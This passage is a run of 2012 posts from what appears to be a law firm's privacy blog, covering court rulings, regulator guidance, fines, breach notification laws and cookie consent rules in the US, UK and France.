In addition, the court declined to dismiss the claims on the grounds that Apple’s Privacy Policy expressly permitted the collection and transfer of user data at issue, in part because the policy’s language was ambiguous as to the exact definition of “personal information.” Although many of the counts against Apple, and all of the counts against the other Mobile Industry defendants – Admob, Inc., Flurry, Inc., AdMarval, Inc., Google, Inc., and Medialets, Inc. – were dismissed, counts against Apple under the CLRA and UCL will proceed.

Notably, the court rejected Apple’s argument that all of the claims should be dismissed on the grounds that Apple has permission to collect and transfer user data pursuant to the Privacy Policy. On this point, the court said that “Plaintiffs have a colorable argument that the terms of the privacy agreement were ambiguous and do not necessarily foreclose the remaining claims against Apple.” The court stated that there was ambiguity as to whether something like a user’s unique device identifier is “personal information” under the terms of the privacy policy, and thus whether its collection and use was consistent with that policy. While this is one trial court decision on a preliminary motion, the decision reinforces the need for companies to closely examine disclosures to see how well they would hold up in any subsequent litigation.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner's Office (ICO) has received 169 complaints thus far about websites failing to comply with the cookie law that came into force May 26, V3.co.uk reports. UK Information Commissioner Christopher Graham stated that his office has received 169 complaints thus far about websites whose policies appear not to comply with the new regulations on cookies, as reported in V3.co.uk. Commissioner Graham is reported to have said that the complaints indicate what individuals are interested in and should serve as a warning to organizations that are not yet compliant. "…There are many [complaints] where customers are pointing out that well-respected brands are not doing anything about the cookie law and [these customers] can't understand why not," Graham said. The CIO Journal is reporting that the ICO has sent out 70 letters to companies that have yet to comply, including to Tesco, Facebook and HSBC.

Despite the alleged non-compliance, the ICO was issuing new guidance right up until the eve of the grace period for enforcement ending. On May 25, the ICO published revised guidance to clarify points around implied consent, and the ICO’s Strategic Liaison Group Manager for Business and Industry posted a blog with a video containing answers to FAQs.

The new guidance confirms that implied consent is a valid form of user consent and complies with the Privacy and Electronic Communications (EC Directive) (Amendment) Regulations 2011, and can be used instead of an explicit opt-in measure. This issue had troubled organisations as the previous guidance seemed to suggest implied consent would not be valid, although website operators are not meant to rely on an assumption that users have read a privacy policy that may be hard to find or difficult to understand.

The latest ICO guidance confirms that user consent can be inferred from users navigating among website pages, provided users have a reasonable understanding that by doing so they have agreed to cookies being set.

The latest guidance also addresses the issue of “prior” consent, and while the ICO’s position is that wherever possible cookies should only be set once users have had an opportunity to understand what cookies are being used and to indicate their consent, website operators should be able to demonstrate that, where it is not possible to obtain this prior consent, they are doing as much as possible to provide timely information about what cookies will placed on the users’ device.

In addition, the guidance clarifies that the mere placement of a statement about cookies in a privacy policy is not sufficiently prominent, and website operators are expected to give a clear and specific explanation to the ICO about why their website is not fully compliant. The ICO further explained that there will be a ‘sliding scale’ of enforcement, with the most intrusive cookies that pose a risk of harm to individuals being the focus of the ICO’s enquires. Since the blog contains a link where users are invited to report their cookie concerns, expect to see the ICO making further statements about the number of complaints and their investigations.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Daniel Kadar.

On 28 May, the French CNIL released new practical guidance related to data violation. A new Article 34 bis has been added to the French Data Protection Act as part of implementing the Telecom Package obliging Electronic Communications Providers (ECPs) to notify “without delay” the French CNIL of any data breach.

Such ECPs are all telecommunication operators registered with the French telecommunications authority (ARCEP), therefore also include all international/foreign Electronic Communications Providers operating in France.

1. The CNIL has set out detailed topical situations in which such immediate notification is required, including:

• Intrusion into the client database of the ECP
• Security breach in an online ECP-boutique allowing access to the credit card number of customers
• Distribution of a confidential customer email to non-related third parties
• Loss of hard copy contractual documents by an agent of a telecom provider in a boutique

The guidance also mentions situations in which such notification is not required:

• Intrusion into the ECP’s own HR database
• Any breach related to activities non-related to providing electronic communication services to the public

2. The guidance outlines the procedure to be followed in the event of a data breach: the notification to the CNIL has to provide full information concerning the nature and the consequences of the data breach; detail measures that have been implemented and/or are planned in response to the breach; identify the persons to be contacted who are in charge internally of resolving the issue; and estimate the number of data owners concerned by the breach.

3. Another key issue is public and/or customer information. The guidance indicates that the CNIL has two months to react to the ECP’s notification and to provide guidance on whether affected customers should be informed.

Should the breach be massive and regarded as important by the CNIL, then immediate information to affected customers could be required by the French Data Protection Agency.

Should such immediate information not be required by the CNIL, customer information could be required after the CNIL has reviewed the ECP’s notification. The ECP would only be exempted from informing customers if the French Data Protection Agency considers the measures taken to resolve the data breach as sufficient. Nonetheless, in the absence of a response from the CNIL within the two-month timeframe, information to customers would be required.

4. This new addition to the French Data Protection Act has a broad reach: It applies to all ECPs operating in France and could be considered enforceable as soon as one customer located in France is affected by the data breach.

This could force ECPs to proactively notify to the French regulator in any case, in addition to other regulators. The CNIL has reiterated that sanctions for non-notification of data breach violations include fines of up to €300,000 and up to five years’ imprisonment, whilst non-compliance with the French regulation itself can be sanctioned by fines of up to €300,000.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Paul Bond and Frederick Lah.

Last week, the New Jersey Appellate Division affirmed a lower court's decision that a defendant did not have a reasonable privacy interest in his cell phone number. Defendant was a middle school teacher who had a sexual encounter with a student when the student was 13 years old. A conversation between the teacher and the student was set up and taped by the police, after a local officer obtained the cell phone number from the school's principal. Defendant objected that he had a reasonable expectation of privacy in his cell phone number and that the state could acquire it only with a warrant.

The court ruled that a telephone number could be protected in some circumstances, but that here, the defendant retained no reasonable privacy interest. The holding was based, in part, on the fact that the defendant exhibited no surprise the victim had his number and that the defendant had in the past disclosed his number to the middle school community, i.e., he provided his telephone number to students and their parents previously in connection with a field trip, and he provided his number for an internal school staff directory. Once disclosed to these discrete communities for those stated purposes, the cell phone lost its status as private information.

The court's common-sense ruling stands in tension with other quickly developing threads of privacy law. Increasingly, companies are being required to tell consumers more about the uses to which their information will be put. The burden on companies to provide "use specification" in ever-growing detail obscures the basic truth that information widely shared is not private. The defendant here made the previous disclosures with the understanding that they would only be used in connection with the field trip and for the internal directory, not for law enforcement purposes. Defendant never consented to having his cell phone number disclosed for law enforcement purposes. But by frequently sharing his cell phone number, he divested himself of the right to object to further sharing, including with the police.

These issues fall in line with previous discussions we've had on this site about this concept of public privacy. Those discussions can be found here and here. Previously, we asked whether the fact that we lose some privacy when we’re in public places means that we should be subject to being recorded with the possibility that the recording be widely publicized on the Internet. Here, we see an analogous line of questioning play out in the context of personally identifiable information. Does the fact that personally identifiable information is voluntarily disclosed to some members of the public mean that the information loses its privacy interest, even if the information is subsequently used for a different purpose for which it was originally disclosed? The court's decision here provides at least one perspective on the issue.
 

• Print
• Comments
• Trackbacks
• Share Link

On May 30, 2012, Acting General Counsel Lafe Solomon of the National Labor Relation Board's (NLRB) issued his third in a series of reports giving employers a road map of a lawful social media policy. In the report, the NLRB reviews seven cases of employer social media policies handled by the NLRB, six of which in part violate the National Labor Relations Act. Included in the six "violation" cases are the following impermissible elements of social media policies:

1.  Rules Defining Confidential Information Too Broadly
2. Rules Requiring the Accuracy of Employee Communications
3. Rules Requiring Employees to Seek Guidance from Their Employer
4. Rules Discouraging Communication or Requiring Reporting of Improper Communication
5. Rules Restricting Communications with Government Officials or the Media
6. Rule Prohibiting Posting of Photos or Videos

Continue reading here on Reed Smith's Employment Law Watch Blog.

 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner’s Office (“ICO”) has issued its largest-ever fine of £325,000 GBP ($503,705 USD) to Brighton and Sussex University Hospitals NHS Trust following the discovery of highly sensitive personal data belonging to tens of thousands of patients and staff, including information relating to sexual health and HIV, on hard drives sold on an Internet auction site in October and November 2010. This marks the highest fine for a “serious breach” of the UK Data Protection Act issued to date by the ICO. In April 2010, the ICO was granted additional powers to issue monetary penalties of up to £500,000.

The ICO's Deputy Commissioner and Director of Data Protection David Smith said in a statement that the high amount of the penalty “reflects the gravity and scale of the data breach.” The fine is also meant to deter lax compliance by warning organisations that they remain liable for the information management activities they outsource.

The Brighton and Sussex University Hospitals NHS Trust had outsourced the destruction of 1,000 hard drives which contained the sensitive data to a third party. However, rather than being destroyed, some of the hard drives were sold in an auction.

Since January 2012, the ICO has issued at least eight fines ranging from £70,000 to £140,000 for various serious data breaches. Some of the highest penalties issued to date have included:

• £140,000, issued in January of this year against Midlothian Council for disclosing sensitive personal data relating to children and their carers to the wrong recipients on five occasions
• £130,000, issued in December 2011 to Powys County Council after the details of a child protection case were sent to the wrong recipient
• £120,000 issued in June 2011 against Surrey county council after sensitive personal information was emailed to the wrong recipients on three occasions

The ICO is increasingly using its powers to issue fines and, by doing so, sending a strong message that serious breaches of the Data Protection Act will not be tolerated.

 

 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The French Data Protection Authority (the “CNIL”) issued a press release 19 April 2012 detailing its planned enforcement agenda for the coming year. The CNIL announced that it intends to conduct around 450 on-site inspections during 2012, with particular focus on six specific themes. The CNIL will also continue work started in 2011, including at least 150 inspections related to video surveillance.

The focus will be on the following areas:

Smartphones: The CNIL will investigate both the purchasing and use of smartphones, in particular data collection by mobile operators and app providers. In relation to mobile operators, the CNIL will focus on the database of mobile customers and the extent of monitoring their customers’ usage.

Health data security: The CNIL intends to continue its work from 2011 in this area and to focus on the development and use of health-related data, in particular by carrying out inspections on medial research facilities, online health-related applications, health care providers, and companies that host health-related data, especially the use of cloud computing.

Data breaches: Given the August 2011 regulations on data breaches, the CNIL will focus on compliance by ISPs to notify the CNIL of data breaches, as well as to notify individuals when the data breach “affects their personal data or private life.”

Sports and hobbies: Despite the CNIL having conducted checks in this sector, the CNIL intends to examine further anti-doping controls, the hosting of sports competitions, and the processing of member and spectator personal data by the main French sports federations, including disclosures to third parties and blacklisting.

Police records: Following a parliamentary report on police records, the CNIL will organize a series of inspections and implement controls on data processing at the national and local levels, relating to the use of personal data and the internal operating services of the police.

Utility and motorway companies: The CNIL intends to focus on transparency of data processing by conducting a broad survey of major companies that provide services to millions of French citizens through the supply of water, gas and electricity, and the collection of road tolls.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Paul Bond and Frederick Lah.

Vermont has recently updated its data breach notification law, Vt. Stat. Tit. 9, Ch. 62, sections 2430 and 2435, to make it one of the stronger data breach notification laws in the country. The new law became effective May 8, 2012. There are three main changes in the law:

First, the definition of security breach has been amended. Previously, "security breach" meant the unauthorized acquisition or access of data. The new definition no longer covers unauthorized access and only defines the term as "unauthorized acquisition … or a reasonable belief of unauthorized acquisition." To help clarify this new standard, the law lists the following factors that companies should consider when determining whether data has been acquired or reasonably believed to have been acquired:
 

• Indications that the information is in the physical possession and control of a person without valid authorization, such as a lost or stolen computer or other device containing information
• Indications that the information has been downloaded or copied
• Indications that the information was used by an unauthorized person, such as fraudulent accounts opened or instances of identity theft reported, or
• Indications that the information has been made public

The second major change of Vermont's law is that it has added a 45-day firm deadline upon discovery of the breach for when consumer notifications must be sent. The vast majority of states speak in general terms and only require that notification be made to consumers "without unreasonable delay" or "in the most expedient time possible." Vermont now joins a handful of other states (Florida, Ohio, and Wisconsin) with a specific firm deadline. All of these states have the same 45-day deadline.

Lastly, the amended law adds a requirement that the state attorney general must be notified of a data breach. The company must notify the attorney general of the date of the breach, date of the discovery of the breach, and a preliminary description of the breach, which shall include the number of Vermont consumers affected, if known. By default, this notification must be done within 14 business days upon discovery of the breach. Puerto Rico is the only other jurisdiction with a firm deadline (10 days) for when government notification must be sent. Interestingly, though, the new law provides companies with an alternative to this 14-business-day requirement. If, prior to the breach, the company has sworn in writing to the attorney general that it maintains written policies and procedures to maintain the security of the consumer information and respond to a breach in a manner consistent with Vermont law, then the 14-business-day requirement would not apply. Instead, the company would just need to notify the attorney general prior to sending the consumer notifications (which have a firm deadline of 45 days). The law provides that the company must make this sworn statement "on a form and in a manner prescribed by the office of the attorney general"; however, no guidance has been released yet on what this form would look like.

This recent update to the Vermont data breach notification law provides yet another wrinkle in the complicated landscape of state data breach notification laws.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Mark S. Melodia, Paul Bond, and Frederick Lah.

Recently, Facebook announced a proposed settlement of a national class action in the United States District Court for the Northern District of California. Fraley, et al. v. Facebook, Inc., 5:11-cv-01726. This settlement has been described by some as settlement of a “privacy lawsuit.” See, e.g., “Facebook to Settle Privacy Lawsuit Over Ads” by Ann Miller in The Recorder, and “Facebook Settling ‘Sponsored Stories’ Privacy Lawsuit” by David Kravets. But is the issue really privacy? For reasons from public relations to legal analysis to insurance coverage, knowing how to characterize this type of dispute is crucial.

The Fraley Complaint challenged an alleged Facebook practice in connection with sponsored ads. Per the Complaint, Facebook would not only display such ads, but would also use the “names, photographs, likenesses, and identities” of Facebook users to help promote the product to friends of those users. The Complaint alleges that a user would be associated with a product by choosing to click a “Like” button, and would then be automatically associated with the corresponding ad campaign. The company hit back with a Motion to Dismiss contesting the existence of any claimed “right of identity,” which would be inconsistent with the operation of the campaign. Thereafter, the parties reached a settlement according to a recent court filing, although details of the settlement were not available. A separate but related lawsuit alleging Facebook violates California state law by including minors in the sponsored stories program is still pending before the court.

While the proposed settlement, if approved, will avoid the need to decide these issues in this case, the ambiguities at issue have been in play in United States law for at least 50 years. Dean Prosser, in his 1960 article “Privacy” for the California Law Review, surveyed what was, even in 1960, a haphazard patchwork of legal authority on this point. He concluded:

“What has emerged from the decisions is no simple matter. It is not one tort, but a complex of four. The law of privacy comprises four distinct kinds of invasion of four different interests of the plaintiff, which are tied together by the common name, but otherwise have almost nothing in common except that each represents an interference with the right of the plaintiff…to be let alone.” Dean Prosser, Privacy, 48 Cal. L. Rev. 388, 389 (1960).

Each of the so-called Prosser torts has since found its way into privacy class action allegations in the Internet age.

“Without any attempt to exact definition, these four torts may be described as follows: 1. Intrusion upon the plaintiff's seclusion or solitude, or into his private affairs; 2. Public disclosure of embarrassing private facts about the plaintiff; 3. Publicity which places the plaintiff in a false light in the public eye; and 4. Appropriation, for the defendant's advantage, of the plaintiff's name or likeness.” Id.

Prior suits regarding, for example, disclosure of Internet search histories or video rental habits, focused on the first two of these Prosser torts: intrusion upon the plaintiff's seclusion or solitude, or into his private affairs and public disclosure of embarrassing private facts about the plaintiff. In addition, FTC consent orders such as those entered into by Google in connection with the launch of Google Buzz, or more recently by MySpace, also involve contested claims about supposedly private affairs or private facts improperly disclosed. The Facebook settlement in Fraley is significantly different, and draws directly on the third and fourth of the Prosser torts: publicity that places the plaintiff in a false light in the public eye; and appropriation, for the defendant's advantage, of the plaintiff's name or likeness. The information at issue – that someone “Likes” a certain product – would have already been displayed on that individual’s profile, available to all of his or her friends. The combination of that freely available information with the sponsored ad makes no new information available. This is a “privacy” claim, if at all, under the aegis of the latter Prosser torts. Friends will falsely believe that a user has taken an endorsement role, the theory goes; name and likeness have been misappropriated.

In an age when brands live or die by their ability to leverage social media to improve customer engagement, including by user-generated content, understanding how all the Prosser torts may impact the use of consumer information is more critical than ever.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Daniel Kadar.

We have previously reported that the French Data Protection Authority (DPA), the CNIL, had sent to Google 19 March 2012, a 12-page questionnaire divided in not less than 69 main questions on Google’s new privacy policy.

The CNIL has been designated by the Working Party 29 to evaluate the compliance to applicable data protection regulation of Google’s new integrated Privacy Policy, as well as of the integrated data processing Google launched 01 March 2012 despite the CNIL’s demand to postpone such launch.

After having analysed Google’s response received at the end of April, the CNIL sent to Google an additional questionnaire on 22 May 2012 in which the CNIL merely asks for a precise description, for each of its previous questions, of the data processing implemented by Google, and considers Google’s approach, which was done based on examples, as non-sufficient. This letter was issued just before a meeting with Google 23 May in Paris.

If the general tone of the CNIL’s President, Mrs. Falque-Pierrotin, to Google’s CEO Larry Page is very amicable, the CNIL’s notes on this letter, published again on CNIL’s website, in English, show how deep the CNIL’s concerns are:

• The CNIL still considers it impossible to know Google's processings of personal data
• It concludes that there is still no clarification regarding the links between collected data, purposes and recipients
• It also considers that the obligation of information of the data subjects is not respected
• The CNIL notes that Google has not provided a maximum retention period for the data 
• It also wants to clarify the effects of Google's opt-out mechanisms and their validity with respect to the right to oppose
• The CNIL lacks Google’s answer as to the treatment of “passive users” defined as users of Google's services (advertising, analytics, +1 button) when they visit third-party websites

Google is due, according to the schedule set forth by the CNIL, to answer until 8 June 2012 to this additional questionnaire.

The CNIL will then provide its conclusions to the Working Party 29 by mid-July.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

In the midst of a rapid increase in the availability and accuracy of facial recognition technology in recent years, the Article 29 Working Party adopted in March this year Opinion 02/2012, highlighting the data protection considerations on the use of facial recognition technology in services such as social networking and for smartphones.

For a more detailed analysis, please click here to read the issued Client Alert.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

In a communication from the European Commission to the Council and European Parliament, the Commission proposes establishing a European Cybercrime Centre (“EC3”) to be part of Europol to “act as the focal point in the fight against cybercrime in the EU”. In its communication, the Commission highlights the total cost of cybercrime to global society as significant, and indicates that no crime is as borderless as cybercrime.

Cybercrime is identified as a high-profit but low-risk form of criminal activity that is becoming increasingly common as we become more of an Internet-based society, using the Internet daily to connect with friends on social networks, or to bank online or do business over the Internet. Cybercrime spans a vast range of offences from identity theft to child sexual abuse to computer fraud and credit card scams which affect EU citizens on a day-to-day basis, and one which is a top priority for the European Commission. There has been some progress and coordinated efforts to tackle cybercrime, but there are still several obstacles to the effective investigation and prosecution of cybercrimes, including jurisdictional boundaries, technical difficulties, and inconsistent cooperation and intelligence-sharing between agencies. The new EC3 will attempt to tackle these obstacles in the fight against cybercrime.

For a more detailed analysis, please click here to read the issued Client Alert.

• Print
• Comments
• Trackbacks
• Share Link

Many CISOs have lost the ability to choose whether cloud computing is coming to the company. Chief Financial Officers are demanding the cost savings of the cloud, especially during this tentative economic recovery where every penny must be stretched to its maximum capacity. In an attempt to be responsive and bridge the CISO - CFO divide, Amy Mushahwar presented a program series entitled,“Virtualization and Cloud Computing Security: Can the CISO Continue to Push Back?" Her bottom line: if organizations must proceed with cloud computing solutions, they should do so fully informed of the risks and armed with information to minimize potential harm to the enterprise environment.

Reed Smith recently hosted a series of meetings on this topic in its Washington, D.C., New York, Pittsburgh and Philadelphia offices with the CISO Executive Network. Please click here for a recorded video conference of Amy presenting to the Washington, D.C. CISO Executive Network.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

In the Article 29 Working Party’s Opinion on the new EU data protection reforms, the Working Party has carefully studied both the Regulation and the Directive, and has given its first general reaction. The Working Party welcomed the provisions intended to clarify and strengthen the rights of individuals, including clarification of consent, the introduction of a transparency principle and enhanced redress, as well as the proposals to harmonise the powers among the national data protection authorities (DPAs).

Despite the positive reaction, the Working Party stated its disappointment in having two legal instruments in a Regulation and a Directive, given that the objectives of the two instruments are the same and that a comprehensive legal framework is achievable.

In relation to the Regulation, the Working Party highlights positive aspects, including:

• Greater clarity through more precise definitions
• Greater rights for individuals regarding their data, such as more transparency, greater control over data processing and strengthened rights to data access
• Simplification and greater consistency for data controllers
• Introduction of Privacy by Design
• Data breach notification requirements
• The Right to be Forgotten, which it hopes will strengthen individuals’ controls over their personal data
• DPAs being given strengthened independence and powers, including fines
   

The Working Party also highlighted weaknesses, including serious reservations about the delegated powers reserved to the European Commission, as well as concern about the increased costs and resources needed by the DPAs, and the broad exceptions for public authorities by reason of public interest. Weakness in relation to the Right to be Forgotten relates to whether it will be possible to enforce, given the way the Internet works and the lack of a mandatory provision requiring third parties to comply with an individual’s request to erase data.

The Working Party most significantly welcomes the introduction of significant fines, which it believes will act as a deterrent and will contribute to a high degree of compliance by data controllers.

In relation to the Directive, the Working Party fears that the number of inconsistencies between the Regulation and the Directive will result in the two instruments not being complementary, and in the potential for the documents not to work together on core aspects, especially given that the Directive has a lower standard of protection than the Regulation.

As the new Regulation and Directive makes its way through the European parliamentary process, it will be interesting to watch whether the two instruments become one so that the overall aim of consistency is achieved, especially as the Directive governs the way in which law enforcement handles individuals’ personal data and the desire for not just corporates, but also government, to be held to the same standards.
 

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Sakil Suleman and Cynthia O'Donoghue.

It is almost a year since the new European rules on website cookies hit the UK. The new rules are significant and impact upon practically all businesses with a website, not just those that operate an e-commerce site. See earlier blog posting. Largely for this reason, the Information Commissioner’s Office (“ICO”) granted website operators a twelve month grace period to work towards compliance with the new rules. That grace period comes to an end on 26 May 2012, although there are still many businesses which have not yet taken steps to comply with the new rules.

For a more detailed analysis, please click here to read the issued Client Alert.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Daniel Kadar.

The French CNIL has released an amended version of its guidance regarding the implementation of the “Telecoms Package” concerning the use of cookies.

As set forth by the 24 August 2011 Ordinance, user consent is in principle required prior to the placement of cookies on an individual’s computer.

Until the revision of its guidance, the CNIL had mentioned a few exceptions to the obligation to obtain the user’s prior consent for the following cookies:

• Cookies utilized for carts on a merchant website
• SessionID cookies
• Cookies having the sole objective of contributing to the security of the IT service for the user
• Cookies allowing to identify the language spoken by the user (if applicable)
• Flash cookies containing elements that are necessary for the use of a media player if the user wants to have access to a content requiring such elements

In addition to this list, the CNIL has now, by reviewing its guidance, added statistics cookies to this list: the CNIL considers that website-going statistics are necessary to the business, and that such statistics should also allow to identify the popularity of the contents that are posted.

As a result, and given the "very limited risk on the protection of privacy", the CNIL decided that such statistics cookies should also be exempted from any prior consent.

Nevertheless, the CNIL outlined several conditions to this additional exemption:

•  As with the other exempted cookies, the editor will need to inform the user of the placement of such cookies. The CNIL foresees that the website’s home page shall display a link allowing to get straight to such information that would be contained in the terms and conditions of use.
• The user shall be able to exercise his/her right of access…
•  … As well as his/her right to oppose. Concerning this right, the tool that will deactivate the functionality should be easily accessible and easy to install on any device (including smart phones). Further, no information concerning the users having used this tool shall be transmitted to the tool's editor.
• The purpose of the system needs to be limited to statistics. No interconnection with other functionalities shall be possible. The generated statistics shall only be produced on an anonymous basis. These statistics shall not be used for different editors at the same time - i.e. only for one editor at once.
• The IP address shall not allow a geolocation that is more precise than allowing to identify the town of the user
• The retention period for cookies shall not be longer than six months

The CNIL added that its position is subject to the future position of the Working Party 29.

Moreover, the revised version of the guidance provides some clarification as to cookies that do not contain personal data: these are per se considered by the CNIL (and the Working Party 29) as subject to the regulation.

The CNIL finally provides additional guidance as to the procedure to be put in place in order to obtain the user’s consent.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

On 2 April, 2012, after almost a year of preparation, the International Chamber of Commerce UK (“ICC”) launched its UK Cookie Guide designed to help website operators and website users comply with new EU rules on the use of cookies. The ICC hopes that if the Guide becomes widely adopted by website operators, then users will be exposed to consistent information regarding cookies, will become familiar with the various types of cookies on websites, and will develop an understanding of the different categories of cookies.

Part 1 of the Guide provides guidance for website operators in relation to content and information contained within the rest of the Guide. Part 1 is intended to provide information to website users in layers, allowing users to access as much or as little information as they want regarding cookies, with the initial layer designed to be simple and straightforward. Part 1 details that the Guide can be used by website operators to educate their users and can make it easier to gain their consent by giving users consistent information across different websites. The Guide is intended to make it easier for users to access information about cookies and be in an informed position to give their consent. Part 1 also touches upon the idea of "browser-based compliance," and the use of icons linked to mechanisms of control so that the user can click onto the icons to find out more information.

Part 2 of the Guide puts cookies into four categories based on their functions and what they are used for. The Guide points out that these categories are not definitive and there may be cookies that do not fit. Furthermore, the categories are designed to evolve as more cookies are discovered. Where a cookie does not fit, website operators will have to devise their own wording and consent approach. The Guide identifies the four categories as:

1. Strictly necessary cookies
2. Performance cookies
3. Functionality cookies
4. Targeting or advertising cookies

Part 2 of the Guide includes a case study describing what a cookie is and gives tips and guidance for website operators on how to approach each category, and how to explain clearly what each category of cookie is used for.

Part 3 of the Guide focuses on technical notes and definitions of the four categories of cookies, giving examples of when the cookies are used and the information that the cookie collects. For example, in Category 1: strictly necessary cookies are “essential first-party session cookies” and will generally be used to store a unique identifier to manage and identify the user in order to provide a consistent and accurate service. Category 1 cookies will remember previous actions or text and will manage, pass and maintain security tokens (i.e., identify if the user is logged in). However, these cookies will not be used for marketing or to remember preferences outside of a single session.

Part 4 of the Guide gives some examples that can be used by website operators to obtain users’ consent to the use of cookies falling within the four categories set out in Part 2. The Guide states that website operators should also provide for withdrawal of consent previously given by users, although there is no prescribed form or examples given in the Guide for this. The Guide states that, for Category 1 cookies, no consent is required because these are strictly necessary cookies. For Category 2 cookies, which only collect information about website usage for the benefit of the website operator, consent can be obtained in the terms and conditions of the site or when the user changes the settings, but this will depend on the kind of website and the precise function of the cookies. For Category 4 cookies, which collect the most information about the user, it is important to obtain clear and informed consent from the user for their use as the party setting the cookie is required by law to do, although in practice the website operator may be better placed to obtain the consent. Guidance given by the UK Information Commissioner’s office, which has welcomed the launch of the ICC’s Guide, states that each party must play its part in obtaining the consent, although it is up to the individual parties to decide the most appropriate method, depending on the purpose of the cookie, so long as the user is given a clear and informed choice.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner’s Office (“ICO”) released recommendations advising organisations to ensure that the data held regarding individuals is thoroughly and securely searchable so they can meet their obligations under the Data Protection Act 1998 (“DPA”). The ICO also clarified when companies can be classified as data controllers. The recommendations came through three sets of guidance issued by the ICO at the end of March 2012.

The right of access under the DPA places a general obligation on organisations in control of an individual’s personal data (data controllers) to provide that individual with a copy of the data in an “intelligible form” upon receiving a written request. Data controllers have been exempted from the obligation to provide a copy when it is not possible or would involve “disproportionate effort" under section 8(2) of the DPA. The ICO believes that too many organisations have relied too heavily on this exemption and have failed to provide access at all, prompting the ICO to clarify the requirement.

The ICO guidance makes it clear that the section 8(2) qualification applies only in respect of supplying a copy of the relevant information to the individual, and is not a basis for a data controller to refuse to respond to an individual’s access request when locating the information would take considerable effort or expense. The ICO expects organisations to have procedures to allow searches of “live” computer systems in anticipation of subject access requests, including situations where supplying a copy of the information to the individual would require “disproportionate effort,” as an organisation will still be obliged to comply with the request in another way. Even where the effort may be “disproportionate,” good practice dictates that organisations must search for records stored in stand-alone, as well as networked, computers, and take “reasonable steps” to look for personal data stored in archived systems in addition to searching manual records and emails.

Data controllers are expected to have procedures in place for searching records on their “live” computer system, as well as “clear policies” on how the system searches and retrieves archived data. Where electronic data has been deleted, the ICO will not usually require an organisation to reconstitute data that has been disposed of in accordance with retention and deletion policies. Companies should have evidence of proper procedures, as this may assist a data controller in persuading the ICO that it has not deleted data with the intention of preventing disclosure. The full guidance on Disproportionate Effort can be found here.

In separate guidance related to access requests, the ICO stated that the exemption under section 31 of the DPA (relating to regulatory activities) applies only to regulatory bodies such as Ombudsmen, the FSA and the IPCC. Full details of the guidance in relation to Regulatory Activity can be found here.

The third guidance note issued by the ICO addresses the distinction between the classifications of data processors and data controllers under the DPA, although the ICO comments that in many cases, deciding who is a data controller and who is a data processor is not always clear-cut, and there will often be differences of interpretation. The ICO states that when determining whether a party involved in the processing of personal data is a data controller, consideration should be given to the degree of independence that each party has in relation to how and in what manner the data is processed. The guidance explained that broadly speaking, in a “simple data controller/data processor relationship” – where the client gives instructions to another party to carry out processing personal data on its behalf and the service provided is straightforward – the client will be the data controller. The service provider who simply follows instructions and has “little or no flexibility” in providing the service is a data processor. The guidance goes on to detail specific and more complex situations in which determining who plays which part becomes more difficult. The full document can be found here.

• Print
• Comments
• Trackbacks
• Share Link

This post was written by Cynthia O'Donoghue, David Cohen and Rosanne Kay.

Reed Smith hosted a seminar in its London office to discuss issues companies face arising from poor Records Management, Data Protection, E-Disclosure and the Proposed EU General Data Protection Regulation. Speakers included the UK Information Commissioner’s Office Head of Strategic Liaison, Jonathan Bamford, and Reed Smith London Partners Cynthia O’Donoghue and Rosanne Kay, and Pittsburgh Partner David Cohen.

In the first session, Cynthia and David addressed the issue of poor records management and how companies can take steps to improve their approach to record keeping in the Electronic Age. They commented that the volume of documentation being stored by companies is becoming increasingly difficult to manage because of emails and documents being kept for too long a period. Companies face conflicting duties of requiring a good retention policy and being prepared for litigation, at the same time as complying with data privacy principles which state that information should not be kept for longer than necessary. Companies are often saving records beyond the point where they have any useful purpose, such as emails that tend to have a lifespan of only six months, and companies can suffer from poor employee productivity when employees spend inordinate amounts of time looking for documents. The speakers advised clients to adopt a ‘six-step action plan’ to address these issues and strike a balance between the different business needs, legal considerations, and data privacy concerns, to create a workable, appropriate retention policy.

Jonathan Bamford gave a presentation on the ICO’s perspective on the EU Data Protection Regulation and Directive. The ICO is seeking a clear, easy-to-understand set of rules containing effective requirements that are both simple to exercise and low cost. The ICO wants accountability and responsibility throughout the information life cycle, and a provision which allows organisations that are compliant with the regulations to “get ahead”. He stated that the ICO welcomed certain aspects of the regulations, including:

• Improved rights for individuals
• A higher standard of consent – in the new draft regulations, consent must be explicit and can be withdrawn
• Incorporation of new concepts such as Privacy by Design
• Stronger supervisory authorities
• More consistency across the EU – one set of regulations across all 27 member states and “one-stop-shop” complaints' procedures

Jonathan explained that some changes in the proposed framework were less welcome by the ICO, including:

• Having a separate Regulation and Directive as the two instruments could cause confusion, because the Directive seems to have a lower standard of protection
• The overly prescriptive nature of the proposed Regulation
• The lack of focus on privacy risk – the UK’s current Data Protection Act and associated measures put privacy risk at the forefront
• An outdated approach to international data transfers
• A “one size fits all” approach towards sensitive data without considering the context and risk

He also expressed doubts regarding some concepts raised in the proposals, stating that the Right to be Forgotten will be very difficult to enforce, and that the potential workload that will be placed on supervisory authorities is almost unworkable. He echoed the view expressed in the ICO’s initial opinion stating that the published opinion will not be the ICO’s last word on the draft EU Regulations.

The last session of the seminar covered E-Disclosure and Cross-Border issues. David Cohen and Rosanne Kay discussed the various issues that arise with e-disclosure/ discovery in litigation in both the UK and the US. Electronic documents have taken on a large significance in litigation in recent years because of the fact that they contain a lot of information, are easy to search using keyword terms and are difficult to destroy, and can be difficult to locate and preserve. New technologies, such as ‘concept searching’ and ‘e-mail threading’, are emerging to aid document reviews. David highlighted an emerging trend in the United States, where sanctions have been imposed on parties for e-discovery mistakes.

